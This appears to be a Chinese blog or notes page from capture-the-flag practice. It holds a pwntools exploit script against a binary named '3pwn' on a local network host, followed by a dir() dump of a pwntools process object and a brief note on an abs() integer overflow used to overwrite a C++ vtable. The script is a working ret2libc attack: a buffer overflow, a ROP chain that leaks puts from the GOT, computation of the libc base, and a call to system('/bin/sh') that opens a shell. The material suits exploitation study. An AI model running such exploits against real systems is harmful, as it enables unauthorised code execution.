#coding:utf-8
from pwn import *
from IPython import *
debug = True
if debug:
context(arch="x86_64",os = "linux",log_level="debug")
p = remote("10.141.10.236",10001)
else:
context(arch="x86_64",os = "linux")
p = remote("10.141.10.43", 10000)
#pwnlib.gdb.attach(proc.pidof(p)[0])
elf = ELF("./3pwn")
main_addr =elf.sym["main"]
puts_addr = elf.sym["puts"]
libc = ELF("libc.so")
def encrypt(idx):
p.recvuntil("choice!\n")
p.sendline("1")
p.recvuntil("encrypted\n")
p.sendline(idx)
#0x0000000000400c83 : pop rdi ; ret
pop_rdi_ret = 0x400c83
payload = "\x00"*0x50 + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(elf.got["puts"]) + p64(puts_addr) +p64(main_addr)
encrypt(payload)
def get_addr():
return u64(p.recvuntil("\x7f")[-6:].ljust(8,"\0"))
libc_puts = get_addr()
libc_base = libc_puts - libc.sym["puts"]
success("libc_base -> {:#x}".format(libc_base))
libc_system = libc_base + libc.sym["system"]
libc_binsh = libc_base + libc.search("/bin/sh").next()
success("libc_system -> {:#x}".format(libc_system))
success("libc_binsh -> {:#x}".format(libc_binsh))
payload = "\x00"*0x50 + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(libc_binsh)+p64(libc_system)
encrypt(payload)
p.interactive()
#embed() #IPython中的中断调试函数
from pwn import *
print(pwn.__file__)
p = process("./2pwn")
print(dir(p))
'''
[+] Starting local process './2pwn': pid 70200
['PIPE', 'PTY', 'STDOUT', '__class__', '__delattr__', '__dict__', '__doc__', '__enter__', '__exit__', '__format__', '__getattr__', '__getattribute__',
'__hash__', '__init__', '__lshift__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__rshift__', '__setattr__', '__sizeof__',
'__str__', '__subclasshook__', '__weakref__', '_corefile', '_cwd', '_fillbuffer', '_get_timeout_seconds', '_getlevel', '_handles', '_log', '_logger',
'_one_time_infos', '_one_time_warnings', '_process__on_enoexec', '_process__preexec_fn', '_process__pty_make_controlling_tty', '_qemu', '_recv', '_setuid',
'_stop', '_stop_noticed', '_timeout', '_validate', 'addHandler', 'alarm', 'argv', 'aslr', 'buffer', 'can_recv', 'can_recv_raw', 'clean', 'clean_and_log',
'close', 'communicate', 'connect_both', 'connect_input', 'connect_output', 'connected', 'connected_directions', 'connected_raw', 'corefile', 'countdown',
'countdown_active', 'critical', 'cwd', 'debug', 'default', 'display', 'elf', 'env', 'error', 'exception', 'executable', 'failure', 'fileno', 'fit', 'flat',
'forever', 'gid', 'hexdump', 'indented', 'info', 'info_once', 'interactive', 'isEnabledFor', 'kill', 'leak', 'level', 'libc', 'libs', 'local', 'log',
'maximum', 'newline', 'p16', 'p32', 'p64', 'p8', 'pack', 'poll', 'preexec_fn', 'proc', 'program', 'progress', 'pty', 'raw', 'read', 'readall', 'readline',
'readline_contains', 'readline_endswith', 'readline_pred', 'readline_regex', 'readline_startswith', 'readlines', 'readn', 'readpred', 'readregex',
'readrepeat', 'readuntil', 'recv', 'recv_raw', 'recvall', 'recvline', 'recvline_contains', 'recvline_endswith', 'recvline_pred', 'recvline_regex',
'recvline_startswith', 'recvlines', 'recvn', 'recvpred', 'recvregex', 'recvrepeat', 'recvuntil', 'removeHandler', 'send', 'send_raw', 'sendafter',
'sendline', 'sendlineafter', 'sendlines', 'sendlinethen', 'sendthen', 'setLevel', 'settimeout', 'settimeout_raw', 'sgid', 'shutdown', 'shutdown_directions',
'shutdown_raw', 'spawn_process', 'stderr', 'stdin', 'stdout', 'stream', 'success', 'suid', 'timeout', 'timeout_change', 'u16', 'u32', 'u64', 'u8',
'uid', 'unpack', 'unrecv', 'wait', 'wait_for_close', 'waitfor', 'warn', 'warn_once', 'warning', 'warning_once', 'write', 'writeafter', 'writeline',
'writelineafter', 'writelinethen', 'writethen']
[*] Stopped process './2pwn' (pid 70200)
'''
溢出点
在update函数,有个典型的abs漏洞,直接输入0x80000000就可以导致abs负数溢出,然后我们就可以直接修改C++中的虚表。
网友评论